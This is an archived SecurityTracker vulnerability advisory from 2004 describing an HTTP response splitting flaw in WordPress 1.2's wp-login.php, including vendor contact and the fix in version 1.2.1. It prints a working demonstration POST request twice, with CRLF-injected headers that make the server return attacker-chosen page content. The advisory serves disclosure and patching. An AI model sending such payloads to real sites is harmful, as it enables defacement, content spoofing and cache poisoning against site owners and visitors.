SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   WordPress Vendors:   wordpress.org
WordPress Input Validation Holes Permit Response Splitting Attacks
SecurityTracker Alert ID:  1011592
SecurityTracker URL:  http://securitytracker.com/id/1011592
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 11 2004
Impact:   Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.2
Description:   An input validation vulnerability was reported in WordPress. A remote user can conduct response splitting attacks.

Chaotic Evil reported that the 'wp-login.php' script does not properly validate user-supplied input. A remote user can submit a specially crafted POST request to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

A demonstration exploit HTTP POST request is provided:

POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226

action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
%2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>
*defaced*</html>

The vendor was notified on September 24, 2004.

Impact:   A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

Solution:   The vendor has issued a fixed version (1.2.1), available at:

http://wordpress.org/development/2004/10/wp-121/

Vendor URL:  www.wordpress.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 15 2004 (Gentoo Issues Fix) WordPress Input Validation Holes Permit Response Splitting Attacks   (Luke Macken <lewk@gentoo.org>)
Gentoo has released a fix.



 Source Message Contents

Date:  Wed, 6 Oct 2004 18:41:02 -0500
Subject:  HTTP Response Splitting Vulnerability in Wordpress 1.2


SECURITY ADVISORY: HTTP Response Splitting in WordPress 1.2

AUTHOR: Chaotic Evil (chaoticevil $$$at$$$ spyring $$$dot$$$ com)

DATE: October 6th, 2004

PRODUCT: WordPress 1.2 (wordpress.org)

FROM THE VENDOR WEBSITE:
WordPress is a state-of-the-art semantic personal 
publishing platform with a focus on aesthetics, web 
standards, and usability. What a mouthful. WordPress is 
both free and priceless at the same time. 

WordPress was born out of a desire for an elegant, well-
architectured personal publishing system built on PHP 
and MySQL and licensed under the GPL.

SECURITY VULNERABILITY
HTTP Response Splitting [1].

EXPLOIT:
HOSTNAME, USER and PASS should be replaced with the 
relevant values (and Content-Length needs to be adjusted 
accordingly). Replace curly braces with less-than and 
greater-than signs. Code is line wrapped.

 
POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226

action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
%2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}
*defaced*{/html}

VENDOR STATUS: Vendor contacted September 24th. Vendor 
worked closely with the author and promptly produced a 
fix (see below).

FIX: Use WordPress 1.2.1. See vendor site:
http://wordpress.org/development/2004/10/wp-121/

REFERENCES:
[1] "'Divide and Conquer' - HTTP Response SPlitting, Web 
Cache Poisoning attacks, and Related Topics" by Amit Klein, 
dated March 4th, 2004
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pd
f


_____________________________________________
Free email with personality! Over 200 domains!
http://www.MyOwnEmail.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC